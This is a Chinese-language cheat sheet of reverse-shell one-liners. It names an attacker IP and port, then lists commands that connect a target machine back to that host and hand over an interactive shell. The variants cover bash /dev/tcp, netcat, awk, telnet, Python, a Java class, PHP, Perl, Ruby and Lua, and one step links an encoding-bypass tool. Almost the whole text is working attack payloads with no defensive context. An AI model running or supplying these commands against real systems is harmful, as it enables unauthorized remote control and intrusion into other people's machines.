反弹shell的各种姿势

前言：攻击机器IP10.10.10.69，监听端口888，反弹命令均在目标机器上执行

nc -lvp 888

1、bash反弹

bash -i >& /dev/tcp/10.10.10.69/888 0>&1

base64编码绕过：http://www.jackson-t.ca/runtime-exec-payloads.html

2、nc反弹

nc -e /bin/bash 10.10.10.69 888

3、awk反弹

awk 'BEGIN{s="/inet/tcp/0/10.10.10.69/888";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

4、telnet反弹
需在攻击监听两个端口，比如888和999端口，执行反弹shell命令后，在888终端输入命令，999终端查看命令执行后的结果
攻击机执行命令：

nc -lvp 888
nc -lvp 999

目标机执行命令：

telnet 10.10.10.69 888 | /bin/bash | telnet 10.10.10.69 999

5、Python反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.69',888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

6、Java反弹

public class Test {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.69/888;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

保存为Test.java，编译执行，成功反弹shell

javac Test.java
java Test

7、PHP反弹

php -r '$sock=fsockopen("10.10.10.69",888);exec("/bin/sh -i <&3 >&3 2>&3");'

8、Perl反弹

perl -e 'use Socket;$i="10.10.10.69";$p=888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

9、Ruby反弹

ruby -rsocket -e'f=TCPSocket.open("10.10.10.69",888).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

10、Lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.69','888');os.execute('/bin/sh -i <&3 >&3 2>&3');"